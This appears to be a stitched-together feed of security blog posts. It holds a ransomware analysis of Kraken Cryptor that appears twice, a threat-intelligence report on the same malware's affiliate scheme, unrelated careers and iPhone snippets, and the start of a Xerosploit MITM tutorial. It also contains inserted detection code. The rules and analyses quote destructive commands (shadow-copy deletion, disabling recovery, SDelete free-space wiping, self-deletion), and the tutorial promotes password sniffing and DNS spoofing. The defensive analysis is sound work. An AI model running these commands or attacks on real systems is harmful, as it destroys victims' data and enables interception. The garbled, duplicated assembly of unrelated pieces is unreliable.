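     "command_line": r"vssadmin delete shadows /all /quiet"},
    {"parent_image": S32 + r"\cmd.exe", "image": S32 + r"\bcdedit.exe",
     "command_line": r"bcdedit /set {default} recoveryenabled No"},
    {"parent_image": S32 + r"\cmd.exe", "image": S32 + r"\shutdown.exe",
     "command_line": r"shutdown /r /t 300"},
    {"parent_image": S32 + r"\eventvwr.exe", "image": S32 + r"\mmc.exe",
     "command_line": r'"C:\Windows\system32\mmc.exe" "C:\Windows\system32\eventvwr.msc"'},
    {"parent_image": S32 + r"\explorer.exe", "image": S32 + r"\shutdown.exe",
     "command_line": r"shutdown /r /t 0"},
    {"parent_image": S32 + r"\explorer.exe", "image": S32 + r"\cmd.exe",
     "command_line": r'"C:\Windows\System32\cmd.exe" /C dir C:\Users'},
]
```

Running `scan(SAMPLE_EVENTS)` flags each of the first six events under exactly one rule and leaves the three benign ones unmatched; `looks_like_kraken` then asks for several distinct behaviours before raising a host-level alert.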

Netguid comparison

The earlier versions of Kraken were delivered by a loader before it moved to a direct execution method. The loader we examined contained a specific netguid. With this, we found additional samples of the Kraken loader on VirusTotal:

Not only did the loader have a specific netguid; the compiled versions of Kraken also shared a netguid, making it possible to continue hunting for samples:

Comparing versions

Kraken uses a configuration file in every version to set the variables for the ransomware. This file is easily extracted for additional analysis.

Based on the config file we have discovered nine versions of Kraken:

  • 1.2
  • 1.3
  • 1.5
  • 1.5.2
  • 1.5.3
  • 1.6
  • 2.0
  • 2.0.4
  • 2.0.7

By extracting the config files from all the versions, we built the following overview of features. (The √ means the feature is present.)

All the versions we examined contain mostly the same options; only the antivirtual-machine protection and antiforensic capabilities vary between some of them. The latest version, Kraken 2.0.7, changed its configuration scheme. We will cover that later in this article.

Other differences in Kraken’s config file include the list of countries excluded from encryption. The standouts are Brazil and Syria, which were not named in the original forum advertisement.

Having an exclusion list is a common method of cybercriminals to avoid prosecution. Brazil’s addition to the list in Version 1.5 suggests the involvement of a Brazilian affiliate. The following table shows the exclusion list by country and version. (The √ means the country appears on the list.)

All the Kraken releases have excluded the same countries, except for Brazil, Iran, and Syria.

Regarding Syria: We believe that the Kraken actors have had the same change of heart as the actors behind GandCrab, who recently released decryption keys for Syrian victims after a tweet claimed they had no money to pay the ransoms.


GandCrab’s change of heart regarding Syrian victims.

Version 2.0.7

The most recent version we examined comes with a different configuration scheme:

This release has more options. We expect this malware will be more configurable than other active versions.

APIs and statistics

One of the new features is a public API to track the number of victims:

Public API to track the number of victims. Source: Bleeping Computer.

Another API is a hidden service to track certain statistics:


The Onion URL can be found easily in the binary:

The endpoint and browser Kraken uses is hardcoded in the config file:

Kraken gathers the following information from every infection:

  • Status
  • Operating system
  • Username
  • Hardware ID
  • IP address
  • Country
  • City
  • Language
  • HDCount
  • HDType
  • HDName
  • HDFull
  • HDFree
  • Privilege
  • Operate
  • Beta

Kraken infrastructure

In Versions 1.2 through 2.04 Kraken contacts blasze[.]tk to download additional files. The site has Cloudflare protection to mitigate DDoS attacks:

The domain is not accessible from many countries:


McAfee coverage

McAfee detects this threat with the following signatures:

  • Artemis!09D3BD874D9A
  • Artemis!475A697872CA
  • Artemis!71F510C40FE5
  • Artemis!99829D5483EF
  • Artemis!CE7606CFDFC0
  • Artemis!F1EE32E471A4
  • RDN/Generic.dx
  • RDN/Generic.tfr
  • RDN/Ransom

Indicators of compromise

Kraken loader hashes


Kraken ransomware samples hashes





  • thiswaskraken@exploit[.]im

Email addresses found in the binaries and configuration files


Bitcoin address

  • 3MsZjBte81dvSukeNHjmEGxKSv6YWZpphH

PDBs found in the loader samples

  • C:\Users\Krypton\source\repos\UAC\UAC\obj\\Release\UAC.pdb

Associated Filenames

  • C:\ProgramData\Safe.exe
  • C:\ProgramData\EventLog.txt
  • # How to Decrypt Files.html
  • Kraken.exe
  • Krakenc.exe
  • Release.bat
  • <random>.bat
  • Sdelete.exe
  • Sdelete64.exe
  • <random>.exe
  • CabXXXX.exe
  • TarXXXX.exe
  • SUPERAntiSpywares.exe
  • KrakenCryptor.exe
  • 73a94429b321dfc_QiMAWc2K2W.exe
  • auService.exe
  • file.exe
  • bbdefac4e59207._exe
  • Build.exe

Ransomware demo version


Kraken Unique Key

MITRE ATT&CK™ techniques

  • Data compressed
  • Email collection
  • File and directory discovery
  • File deletion
  • Hooking
  • Kernel modules and extensions
  • Modify registry
  • Process injection
  • Query registry
  • Remote system discovery
  • Security software discovery
  • Service execution
  • System information discovery
  • System time discovery

Yara rules

The McAfee Advanced Threat Research team created Yara rules to detect the Kraken ransomware. The rules are available on our Github repository.


The post Fallout Exploit Kit Releases the Kraken Ransomware on Its Victims appeared first on McAfee Blogs.

Kraken Cryptor Ransomware Gains Popularity Among Cybercriminals

Insikt Group

Co-Authored by Marc Rivero López and John Fokker of McAfee

Click here to download the complete analysis as a PDF.

Scope Note: Insikt Group used the Recorded Future product and dark web analysis to track the activity of threat actor ThisWasKraken, who operates the Kraken Cryptor ransomware affiliate program on a top-tier Russian-speaking criminal forum.

Insikt Group collaborated with researchers at McAfee. Ransomware continually represents a major risk to organizations, and the target audience of this research includes day-to-day security practitioners as well as executive decision makers.

Click here to read the McAfee report.

Executive Summary

Kraken Cryptor is a ransomware-as-a-service (RaaS) affiliate program that was introduced on August 16, 2018, on a top-tier Russian-speaking cybercriminal forum by the threat actor ThisWasKraken. Kraken Cryptor has gained popularity among members of the dark web, has been used to target users of the popular antivirus program SuperAntiSpyware, and has also been distributed through the Fallout exploit kit.

Key Judgments

  • The Kraken Cryptor ransomware was first seen in the wild in August 2018.
  • Kraken is distributed by members of an affiliate program operated by ThisWasKraken, who is only active on Russian criminal forums.
  • To distribute malware, ThisWasKraken and/or its affiliates likely use the Fallout exploit kit.
  • We have identified that ThisWasKraken is using online casino BitcoinPenguin to launder illicitly gained funds.
  • Insikt Group assesses with a high degree of confidence that ThisWasKraken works within a team, whose members could be residing in Iran, Brazil, or former Soviet bloc countries.


The Kraken Cryptor ransomware is a connectionless strain of ransomware that communicates with victims via email in place of any command and control (C2) infrastructure or landing pages. Kraken was first observed in the wild in August 2018 and gained notoriety when it was distributed from the compromised website of SuperAntiSpyware, disguised as the antivirus program.[1] Kraken has also been distributed to victims via spam and malvertising campaigns, some of which redirect to the Fallout exploit kit for the final installation phase.

Insikt Group has attributed the Kraken Cryptor ransomware to the threat actor ThisWasKraken, who operates the affiliate program that gives other actors access to Kraken for distribution. ThisWasKraken is relatively new to the dark web and is exclusively active on a Russian criminal forum, where the actor registered on August 12, 2018. The actor communicates using Russian and English; however, the analysis of their forum posts indicates that ThisWasKraken is neither a native Russian nor English speaker. To make forum posts in Russian, the actor likely uses automated translation services, as is evident by the awkward phrasing indicative of such a service. In contrast, the actor is noticeably more proficient in English, though they make mistakes consistently in both sentence structure and spelling.

Kraken Cryptor Advertisement

Advertisement for the Kraken Cryptor v2 affiliate program on a criminal forum.

The Kraken Cryptor ransomware is not sold to users on a one-time basis. It is instead operated as an affiliate program that distributes builds of the ransomware to its participants, who in turn repay a percentage of the income earned from ransom payments. This technique of ransomware distribution, known as ransomware-as-a-service (RaaS), is commonly used on the dark web by cybercriminals because of its efficiency. ThisWasKraken calls the service the Kraken Cryptor v2 affiliate program, or Kraken ransomware-as-a-service, which was last updated on October 21. The latest version of the Kraken Cryptor is v.2.0.7.

Kraken Cryptor Ransom Note

Kraken Cryptor ransomware v.2.0.7 ransom note with instructions for how to decrypt infected files.

At the time of this report, the Kraken Cryptor ransomware-as-a-service (RaaS) required all potential affiliate partners to pay $50 per payload. Below are some of the terms and conditions of the affiliate program:

  • Affiliates receive 80 percent of the paid ransom.
  • The program can reject any member or candidate without explanation.
  • Affiliates receive a 24/7 support service.
  • Submitting Kraken sample files to antivirus services is forbidden.
  • The service provides no refunds for purchased payloads.

Kraken Cryptor Ransomware

ThisWasKraken introduced the Kraken Cryptor ransomware on a criminal forum on August 16, 2018.

Threat Analysis

According to ThisWasKraken, the Kraken Cryptor RaaS does not allow the targeting of the following former Soviet bloc countries:

  • Armenia
  • Azerbaijan
  • Belarus
  • Estonia
  • Georgia
  • Kyrgyzstan
  • Kazakhstan
  • Lithuania
  • Latvia
  • Moldova
  • Russia
  • Tajikistan
  • Turkmenistan
  • Ukraine
  • Uzbekistan

In addition to the countries listed above, the latest samples of Kraken that have been identified in the wild no longer affect victims in Syria, Brazil, and Iran, suggesting that ThisWasKraken (or their associates) may have some connection to Brazil and Iran, though this is not confirmed. It is likely that Syria was added following the plea for help from a victim whose computer was infected by another ransomware called GandCrab.

According to the map of infections provided below, we can still see a minor level of infections in excluded countries, despite specific fail-safe controls put in place by Kraken developers.

Each affiliate of Kraken Cryptor RaaS receives a unique build of Kraken and must send the following information to ThisWasKraken to be configured:

  • A primary email address to communicate with victims
  • An alternative email address to communicate with victims
  • A ransom amount in Bitcoin, usually varying from 0.075 to 1.25 BTC
  • A list of countries not to target

The analysis of the actor’s communication suggests that ThisWasKraken is likely part of a team and not personally involved in the development of the ransomware directly. The actor’s role is customer facing, which is accomplished through the Jabber account thiswaskraken@exploit[.]im. Communications with ThisWasKraken show that the actor refers all technical issues to the product support team at the email address teamxsupport@protonmail[.]com.

Bitcoin is the only currency the affiliate program uses, and Insikt Group identified several wallets associated with the operation. Interestingly, it appears that Kraken’s developers choose BitcoinPenguin, an online gambling site, as the primary money laundering conduit. Although not unusual, it is still very uncommon for criminal actors — specifically ransomware operators — to depart from more traditional cryptocurrency exchangers when laundering stolen funds. It is likely that one of the decisive factors for this unusual choice was due to the fact that BitcoinPenguin does not require any identity verification of its members, allowing anyone to maintain an anonymous cryptocurrency wallet there. Cryptocurrency exchangers are continuing to stiffen their registration rules in response to regulatory demands, but online crypto casinos do not have to follow the same “know your customer” (KYC) guidelines, providing a convenient loophole for all kinds of money launderers.

Bitcoin Transactions

Bitcoin transactions associated with Kraken and analyzed with the Crystal Blockchain software.

On October 4, 2018, BleepingComputer reported that the Fallout exploit kit was being used to deliver the Kraken Cryptor ransomware v.1.5. It should be noted that on multiple occasions, ThisWasKraken mentioned the Fallout exploit kit and praised it for its high infection rate. At one point, ThisWasKraken even stated, “One of our partners joined the Fallout exploit kit, which is good for us.” Also, other forum messages indicate that ThisWasKraken purchased hijacked web traffic, which may be the same traffic responsible for Kraken infections from the Fallout exploit kit.

Web Traffic Graphic

Graphic posted by ThisWasKraken showing web traffic used to distribute the Kraken Cryptor RaaS by country.

Below are the technical specifications of the Kraken Cryptor ransomware v.2.0.7 posted by ThisWasKraken on October 21, 2018:

  • The ransomware is written in C# (.NET Framework v. 3.5).
  • The ransomware works offline and supports communication via email.
  • The size of the payload is around 85 KB, but antivirus analysis indicates that the payload size often reaches up to 94 KB.
  • Kraken primarily targets Windows OS versions 8, 8.1, and 10.
  • Kraken has a high speed of encryption.
  • There is no file size limit for the encryption process.
  • The ransomware collects system information when victims are online.
  • Kraken uses a hybrid encryption algorithm, including AES-128/256 (CBC mode), as well as other ciphers (RSA, Salsa20, RC4).
  • The ransomware uses a smart obfuscation encryption method to target random positions of files, including network sharing encryption.
  • The ransomware encrypts storage devices on shared networks.
  • It is impossible to recover without paying the ransom.
  • Anti-debugging and anti-forensics tools are included in the package.
  • Ransom messages are available in 15 languages in HTML and TXT formats.
  • “Canary trap” anti-ransomware bypass methods are applied to identify key leaks.
  • Infection statistics are based on IPs.

Affiliates are given a new build of Kraken every 15 days to keep the payload fully undetectable (FUD) from antivirus software. According to ThisWasKraken, when a victim asks for a free decryption test, the affiliate member should send one of the victim’s files with its associated unique key to the Kraken Cryptor ransomware support service. The service will decrypt the file and resend it to the affiliate member to forward to the victim. After the victim pays the full ransom, the affiliate member sends 20 percent of the received payment to the RaaS to get a decryptor key, which is then forwarded on to the victim. This system ensures the affiliate pays their percentage to the affiliate program and does not simply pocket the full amount for themselves.

Technical Analysis

The following technical analysis was conducted by McAfee’s Advanced Threat Research team and the results were shared with Recorded Future.

The Kraken Cryptor ransomware encrypts data on the disk very quickly and uses external tools, such as SDelete from the Sysinternals Suite, to wipe files, making file recovery harder.

Kraken Cryptor Infection Scheme

The Kraken Cryptor infection scheme through the Fallout exploit kit.

The ransomware implements a user account control (UAC) bypass using the Windows Event Viewer. This bypass technique is used by other malware families and is quite effective for executing malware.

Ransomware Using Windows Event Viewer

The ransomware uses Windows Event Viewer to bypass UAC.

The technique is well explained in an article by blogger enigma0x3.

McAfee analyzed an early subset of Kraken ransomware samples and determined that they were still in the testing phase, adding and removing options. The ransomware implemented a “protection” to delete itself during the infection phase:

  • "C:\Windows\System32\cmd.exe" /C ping -n 3 > NUL&&del /Q /F /S C:\Users\Administrator\AppData\Local\Temp\krakentemp0000.exe

This step is to prevent researchers and endpoint protections from catching the file on an infected machine.

Kraken encrypts user files with a random name and drops the ransom note demanding that the victim pay to recover them. Each file extension is different; this technique is often used by specific ransomware families to bypass endpoint protection systems.

Kraken, delivered by the exploit kit, bypasses the UAC using Event Viewer, drops a file on the system, and executes it through the UAC bypass method.

Exploit Kit Delivering Binary

The binary delivered by the exploit kit.

During the compilation of the first versions, the authors of the binary forgot to delete the PDB reference, revealing that the file has a relationship with Kraken Cryptor.

Ransomware Early Version

An early version of the ransomware with the path on Disk C.

The early versions contained the following path:

  • C:\Users\Krypton\source\repos\UAC\UAC\obj\\Release\UAC.pdb

Later versions “dropped” the PDB path together with the Kraken loader.

Using Sysinternals Tools for Harder File Recovery

One unique feature of this ransomware family is the use of SDelete. Kraken uses a .bat file to perform certain operations, making file recovery much more challenging:

Kraken Cryptor

Kraken Cryptor v.1.6 with SDelete bat file makes file recovery harder.

Kraken downloads SDelete from the Sysinternals website, adds the registry key that accepts the EULA (to avoid the pop-up), and executes it with the following arguments:
sdelete.exe -c -z C

The SDelete batch file makes file recovery much harder by overwriting all free space on the drive with zeros, deleting the Volume Shadow Copies, disabling the recovery reboot option, and finally, rebooting the system after 300 seconds.
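Three of the behaviours McAfee describes above (the Event Viewer UAC bypass, the ping-then-del self-deletion, and the SDelete free-space wipe) each leave a recognisable trace in endpoint telemetry. What follows is an added detection example, not code from the report or from either vendor: it runs over constructed Sysmon-style process-creation and registry events (the victim paths are made up). The `mscfile\shell\open\command` key is the handler that enigma0x3's technique redirects, and `Software\Sysinternals\SDelete\EulaAccepted` is the standard Sysinternals EULA value; both are assumed here rather than taken from the report.

```python
"""Added detection example: flag the Kraken behaviours described above in
Sysmon-style process-creation and registry events. Sample events are constructed."""
import ntpath
import re
from typing import Dict, List, Tuple

Event = Dict[str, str]

# Constructed sample telemetry (not real captures); victim paths are made up.
SAMPLE_EVENTS: List[Event] = [
    # Event Viewer UAC bypass: mscfile handler pointed at the payload (enigma0x3 technique)
    {"type": "registry_set",
     "key": r"HKCU\Software\Classes\mscfile\shell\open\command",
     "value": r"C:\Users\victim\AppData\Local\Temp\krakentemp0000.exe"},
    # eventvwr.exe should only ever launch mmc.exe; anything else is the hijacked handler
    {"type": "process", "parent": r"C:\Windows\System32\eventvwr.exe",
     "image": r"C:\Users\victim\AppData\Local\Temp\krakentemp0000.exe", "cmdline": ""},
    # self-deletion via cmd /C ping ... && del, as quoted in the report
    {"type": "process", "parent": r"C:\Users\victim\AppData\Local\Temp\krakentemp0000.exe",
     "image": r"C:\Windows\System32\cmd.exe",
     "cmdline": r'"C:\Windows\System32\cmd.exe" /C ping -n 3 > NUL&&del /Q /F /S '
                r"C:\Users\victim\AppData\Local\Temp\krakentemp0000.exe"},
    # SDelete EULA auto-accepted (assumed standard Sysinternals value), then free-space wipe
    {"type": "registry_set",
     "key": r"HKCU\Software\Sysinternals\SDelete\EulaAccepted", "value": "1"},
    {"type": "process", "parent": r"C:\Windows\System32\cmd.exe",
     "image": r"C:\Users\victim\AppData\Local\Temp\sdelete.exe",
     "cmdline": "sdelete.exe -c -z C"},
    # benign control: a plain ping from an interactive shell, must not fire
    {"type": "process", "parent": r"C:\Windows\explorer.exe",
     "image": r"C:\Windows\System32\cmd.exe", "cmdline": "cmd.exe /C ping -n 3 example.org"},
]

MSCFILE_HANDLER = re.compile(r"\\mscfile\\shell\\open\\command$", re.IGNORECASE)
SDELETE_EULA = re.compile(r"\\Sysinternals\\SDelete\\EulaAccepted$", re.IGNORECASE)
# "ping -n <n> ... && del <target>": the delay-then-delete idiom; target captured for a parent check
PING_THEN_DEL = re.compile(r"ping\s+-n\s+\d+\b.*?&&\s*del\b(?P<target>.*)$", re.IGNORECASE)
SDELETE_WIPE_FLAGS = re.compile(r"(^|\s)-[cz]\b")  # -c clean free space, -z zero free space


def _base(path: str) -> str:
    """Lower-cased file name of a Windows path (ntpath handles backslashes on any OS)."""
    return ntpath.basename(path).lower()


def check_event(ev: Event) -> List[str]:
    """Return the names of every rule the event matches (empty list if benign)."""
    hits: List[str] = []
    if ev["type"] == "registry_set":
        if MSCFILE_HANDLER.search(ev["key"]):
            hits.append("eventvwr_uac_bypass_handler")
        if SDELETE_EULA.search(ev["key"]):
            hits.append("sdelete_eula_accepted")
        return hits

    parent, image, cmd = _base(ev["parent"]), _base(ev["image"]), ev.get("cmdline", "")
    if parent == "eventvwr.exe" and image != "mmc.exe":
        hits.append("eventvwr_spawned_non_mmc")
    m = PING_THEN_DEL.search(cmd)
    # only fire when the file being deleted is the process's own parent (self-deletion)
    if m and parent in m.group("target").lower():
        hits.append("self_delete_ping_del")
    if image.startswith("sdelete") and SDELETE_WIPE_FLAGS.search(cmd):
        hits.append("sdelete_free_space_wipe")
    return hits


def scan(events: List[Event]) -> List[Tuple[int, str]]:
    """Run every rule over an event stream; returns (event index, rule name) pairs."""
    return [(i, hit) for i, ev in enumerate(events) for hit in check_event(ev)]


if __name__ == "__main__":
    for idx, rule in scan(SAMPLE_EVENTS):
        print(f"event {idx}: {rule}")
```

The self-deletion rule deliberately requires the `del` target to name the parent process, otherwise any scripted `ping && del` housekeeping would fire; the SDelete rule fires only on the free-space flags (`-c`/`-z`), since plain file deletion with SDelete is a legitimate admin task.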

Netguid Comparison

Earlier versions of Kraken were delivered by a loader before it moved to a direct execution method. The loader we examined contained a specific netguid. With this, McAfee found additional samples of the Kraken loader on VirusTotal:

Kraken Cryptor

Additional hash values found on VirusTotal.

Not only did the loader have a specific netguid, but the compiled versions of Kraken also shared a netguid, making it possible to continue hunting samples:

Additional Hash Values

Additional hash values detected.

Comparing Versions

Kraken uses a configuration file in every version to set the variables for the ransomware. This file is easily extracted for additional analysis.

Kraken Cryptor Configuration File

Image of the configuration file of Kraken Cryptor.

Based on the configuration file, McAfee discovered nine versions of Kraken:

  • 1.2
  • 1.3
  • 1.5
  • 1.5.2
  • 1.5.3
  • 1.6
  • 2.0
  • 2.0.4
  • 2.0.7

By extracting the configuration files from all of the versions, McAfee built the following overview of features (the checkmark means the feature is present):

Feature Overview

Overview of the features of all identified versions of the ransomware.

All of the versions we examined mostly contain the same options, differing only in some of the anti-virtual protection and anti-forensic capabilities. The latest version, Kraken 2.0.7, changed its configuration scheme and is covered later.

Other differences in Kraken’s configuration file include the list of countries excluded from encryption. The standouts are Brazil and Syria, which were not named in the original forum advertisement.

Having an exclusion list is a common method for cybercriminals to avoid prosecution. Brazil’s addition to the list in Version 1.5 suggests the involvement of a Brazilian affiliate. The following table shows the exclusion list by country and version (the checkmark means the country appears on the list):

Exclusion List

Exclusion list by country and version indicates the list of countries that are not allowed to attack.

All of the Kraken releases have excluded the same countries, except for Brazil, Iran, and Syria.[2]

Version 2.0.7

The most recent version examined comes with a different configuration scheme:

Configuration Version

Configuration version of the Kraken Cryptor v. 2.0.7.

This release has more options. McAfee expects this malware will be more configurable than other active versions.

APIs and Statistics

One of the new features is a public API to track the number of victims:

Public API

Public API to track the number of victims. Source: Bleeping Computer

Another API is a hidden service to track certain statistics:

Statistics Collection

Statistics collection and monitoring site that likely does not have the functionality of a typical C2 panel.

The Onion URL can easily be found in the binary:

Detected URL

kraken656kn6wyyx[.]onion URL detected using the API.

The endpoint and browser that Kraken uses is hardcoded in the configuration file:

Configuration File

The configuration file contains data about the endpoint and browser.

Kraken gathers the following information from every infection:

  • Status
  • Operating System
  • Username
  • Hardware ID
  • IP Address
  • Country
  • City
  • Language
  • HDCount
  • HDType
  • HDName
  • HDFull
  • HDFree
  • Privilege
  • Operate
  • Beta

Kraken Infrastructure

In versions 1.2 through 2.04, Kraken contacts blasze[.]tk to download additional files. The site has Cloudflare protection to mitigate DDoS attacks.

Downloading Additional Files

Kraken Cryptor used blasze[.]tk website to download additional files for versions 1.2 through 2.04.

This domain is not accessible from the following countries:

Countries Blocking Domain

Countries that block the domain blasze[.]tk.

Insikt Group was able to obtain a sample of the Kraken Cryptor ransomware and successfully encrypt and then decrypt a 64-bit Windows 7 machine. The encryption phase locked all target files, and, in those directories, placed a ransom note in HTML format with instructions for the victim. The note first instructs the victim to buy Bitcoin through or, and then to contact the primary or secondary email address listed for further instructions. Obviously, the infected machine still has access to its web browsers, so the victim can communicate with the attacker and pay the ransom.

Ransom Note

Partial screenshot of the ransom note left by Kraken.

When the victim pays the ransom, they receive an email containing a link for the file-sharing service that in turn downloads two files, Decryptor.exe and Private.txt. Private.txt contains two datasets: a private key and a private IV. When the program Decryptor.exe is executed, it requires the victim to copy and paste the private key and private IV into the respective fields in order to decrypt the files on their machine.

Kraken Decryptor

Screenshot of the Kraken decryptor sent to the victim after payment.


The Kraken Cryptor ransomware is a 32-bit malware written using .NET Framework and protected with SmartAssembly, a commercial obfuscator that protects an application against reverse engineering. The malware is fully customizable through a JavaScript Object Notation (JSON) file that is likely generated by its builder.

The existence of the list of countries that are not allowed to be targeted indicates that the members of this possible international hacking group may reside in these nations. Such behavior is usually a security step taken by criminals who do not want to be pursued by local law enforcement agencies. Considering that ThisWasKraken is not a native English or Russian speaker, the actor may reside in Brazil or Iran.

To view a full list of the associated indicators of compromise, download the appendix.

[1] It should be noted that the Kraken Cryptor ransomware is different from the Kraken ransomware widely distributed in 2016, and is not linked to another ransomware strain detected in 2013 that used the “.kraken” extension.

[2] McAfee believes that the creators of Kraken had the same change of heart as the actors behind GandCrab, who recently released decryption keys for Syrian victims after a tweet claimed they had no money to pay the ransoms.

The post Kraken Cryptor Ransomware Gains Popularity Among Cybercriminals appeared first on Recorded Future.


New iPhone Passcode Bypass Found Hours After Apple Releases iOS 12.1

It's only been a few hours since Apple released iOS 12.1, and an iPhone enthusiast has managed to find a passcode bypass hack, once again, that could allow anyone to see all contacts' private information on a locked iPhone. Jose Rodriguez, a Spanish security researcher, contacted The Hacker News and confirmed that he discovered an iPhone passcode bypass bug in the latest version of its iOS

Returning to Work? Make it McAfee!

By: Vera, Software Developer

After nine years out of the workplace, I was ready to return to software development. The idea was challenging at first. Would my skills still be valued? Which company would be right for me?

To prepare, I attended seminars and technology deep-dives for people looking to return to software development work. McAfee offered a 12-week, full-time, compensation-based experience program which I was delighted to accept. Designed to help people successfully re-integrate into the workplace after time away, it’s part of McAfee’s strategy to help fill the cybersecurity skills gap and encourage diversity in the technology sector.

Everyone I spoke with at McAfee impressed me as they shared their roles and experiences with the company. I really liked the support, guidance and resources McAfee offered applicants—it gave me the confidence I needed to step back into work. It was clear McAfee would be the perfect starting point for me, my natural first choice when returning to work.

Part of the Team and Learning Fast

Joining McAfee’s Web Security Research software development group in Cork, Ireland, I felt welcome and part of the team from Day One. The culture is inclusive and welcoming, and creativity and new ideas are encouraged.

Nine years out of practice and with experience in Java-based software, but none in cybersecurity, I had much to learn. I loved the way everyone in my team was always ready to help and support me.

The team uses the scrum development approach, members collaborating extensively on tasks in two-week sprints. We also use pair programming, working on tasks in pairs.

Scrum and pair programming were both new to me, but I quickly gained a comprehensive understanding of the technologies, techniques and tools as we bounced ideas off one another and addressed challenges together. It was great to develop skills and re-integrate with the workplace so rapidly.

I learned not only about security and McAfee’s solutions, but also about the Linux platforms they run on. I hadn’t done any Unix work since my graduate days, but the team provided support and advice whenever I needed it.

Make the Most of Your Placement

I’d recommend McAfee to anyone looking to return to the workplace. The company has been a great employer and a fantastic way to restart my career. Here are my top five tips for getting the most out of returning to work.

1. Do Your Homework
It’s important to find the right fit for you and your skills. Speak to team members to discover what the company is like, and the products, processes and technologies you’ll be working with.

2. Go Ahead – Apply!
Believe in yourself. You’ve had a good career and responsibilities in the past and your knowledge hasn’t evaporated. You can do even more in the future—I can attest to that. Wherever your next opportunity is, make sure it’s the perfect place to acquire skills and knowledge you may have missed during your time away.

3. Build Your Skills
Expand your expertise through Return to Work seminars and other resources. Review current technologies and thinking. Expand your capabilities and confidence!

4. Extend Your Network
Before and during your time at your placement company, develop connections with relevant people in your team, and in the industry as a whole.

5. Ask Questions
McAfee operates from a foundation of trust and respect. Questions get answers that support progress and development. If you don’t know, ask, either in your team or in your personal development sessions, an integral part of the program.

If you’re apprehensive, don’t worry – that’s normal! I was unsure when I first considered returning to work, especially after such a long break, but now I’m delighted to be back, and even more so to be working with McAfee in a permanent, full-time role.

It’s great to be part of a company that recognizes the capabilities of people who took time out of the workplace, investing time and resources to help us get that all-important foot back in the door. I didn’t know I could do it – now I know I can!

For more stories like this, follow @LifeAtMcAfee on Instagram and on Twitter @McAfee to see what working at McAfee is all about.

Interested in learning more about a career at McAfee? Apply here!

The post Returning to Work? Make it McAfee! appeared first on McAfee Blogs.

Xerosploit- A Man-In-The-Middle Attack Framework

Networking is an important area for an ethical hacker to check, since many threats can come from the internal network, such as network sniffing, ARP spoofing and MITM attacks. This article is on Xerosploit, which provides advanced MITM attacks on your local network to sniff packets, steal passwords, etc.

Table of Content

  • Introduction to Xerosploit
  • Man-In-The-Middle
  • Xerosploit Installation
  • PSCAN (Port Scanner)
  • DOS (Denial of service)
  • dspoof
  • Driftnet

Introduction to Xerosploit

Xerosploit is a penetration testing toolkit whose goal is to perform man-in-the-middle attacks for testing purposes. It brings various modules that allow efficient attacks to be carried out, and also allows denial of service attacks and port scanning. It is powered by bettercap and nmap.

For those who are not familiar with the man-in-the-middle attack, welcome to the world of internal network attacks.

Dependencies:
  • nmap
  • hping3
  • build-essential
  • ruby-dev
  • libpcap-dev
  • libgmp3-dev
  • tabulate
  • terminaltables

Xerosploit is built with various features:

  • Port scanning
  • Network mapping
  • Dos attack
  • Html code injection
  • Javascript code injection
  • Download interception and replacement
  • Sniffing
  • Dns spoofing
  • Background audio reproduction
  • Images replacement
  • Driftnet
  • Webpage defacement and more


A man-in-the-middle attack (MITM) is an attack where the attacker secretly relays and possibly alters the communication between two parties who believe they are directly communicating with each other. There are many open source tools available online for this attack, such as Ettercap, MITMf and Xerosploit.
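On a switched LAN, tools of this kind get into the middle by poisoning the ARP caches of the victim and the gateway so that both send their frames to the attacker's MAC. The monitor below is an added example from the defender's side, not part of the original article or of Xerosploit: it watches ARP replies and raises an alert when the MAC claimed for an IP changes, and a stronger one when a single MAC claims both the gateway and another host. The trace, addresses and MACs are all constructed.

```python
"""Added example: ARP cache poisoning detection over a constructed ARP reply trace."""
from collections import defaultdict
from typing import Dict, List, NamedTuple, Set


class ArpReply(NamedTuple):
    ts: float          # seconds since capture start
    sender_ip: str     # IP the reply claims to speak for
    sender_mac: str    # MAC it asks everyone to cache for that IP


GATEWAY_IP = "192.168.1.1"

# Constructed trace (not a real capture): a gateway, one host, then a third
# station announcing itself as both of them.
SAMPLE_TRACE: List[ArpReply] = [
    ArpReply(0.0, "192.168.1.1", "aa:bb:cc:00:00:01"),
    ArpReply(1.0, "192.168.1.20", "aa:bb:cc:00:00:20"),
    ArpReply(2.0, "192.168.1.1", "de:ad:be:ef:00:99"),   # gateway now claimed by a new MAC
    ArpReply(2.1, "192.168.1.20", "de:ad:be:ef:00:99"),  # same MAC also claims the host
    ArpReply(2.2, "192.168.1.1", "de:ad:be:ef:00:99"),   # repeated: no duplicate alert
]


class ArpMonitor:
    """Tracks IP->MAC and MAC->IPs bindings seen in ARP replies and reports anomalies."""

    def __init__(self, gateway_ip: str) -> None:
        self.gateway_ip = gateway_ip
        self.ip_to_mac: Dict[str, str] = {}
        self.mac_to_ips: Dict[str, Set[str]] = defaultdict(set)
        self.alerts: List[str] = []
        self._seen: Set[str] = set()  # dedupe: each distinct alert is reported once

    def observe(self, reply: ArpReply) -> List[str]:
        """Feed one ARP reply; returns the alerts newly raised by it."""
        new: List[str] = []
        prev = self.ip_to_mac.get(reply.sender_ip)
        if prev is not None and prev != reply.sender_mac:
            kind = "gateway" if reply.sender_ip == self.gateway_ip else "host"
            new.append(f"{kind}-mac-change {reply.sender_ip}: {prev} -> {reply.sender_mac}")

        self.ip_to_mac[reply.sender_ip] = reply.sender_mac
        self.mac_to_ips[reply.sender_mac].add(reply.sender_ip)
        ips = self.mac_to_ips[reply.sender_mac]
        # One MAC answering for the gateway and for another host is the classic
        # two-sided poisoning that lets the station relay both directions.
        if len(ips) > 1 and self.gateway_ip in ips:
            new.append(f"mac-claims-gateway-and-host {reply.sender_mac}: {sorted(ips)}")

        raised = [a for a in new if a not in self._seen]
        self._seen.update(raised)
        self.alerts.extend(raised)
        return raised


def run_monitor(trace: List[ArpReply], gateway_ip: str = GATEWAY_IP) -> List[str]:
    """Replay a trace through a fresh monitor and return all alerts in order."""
    monitor = ArpMonitor(gateway_ip)
    for reply in sorted(trace):
        monitor.observe(reply)
    return monitor.alerts


if __name__ == "__main__":
    for alert in run_monitor(SAMPLE_TRACE):
        print(alert)
```

A gateway MAC change on its own is not proof of an attack (a VRRP/HSRP failover or a replaced router produces the same event), which is why the monitor keeps the weaker per-IP alert separate from the gateway-plus-host claim that a relaying attacker necessarily produces.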


Xerosploit Installation

Xerosploit is a MITM attack tool which runs only on Linux. To install it, follow these simple steps:

Open up a terminal and type:

git clone
cd xerosploit

It will ask you to choose your operating system; here we pressed 1 for Kali Linux.

Here it will display your network configuration, including IP address, MAC address, gateway, interface and host name. Now run the following command in the xerosploit console to see the initial commands:


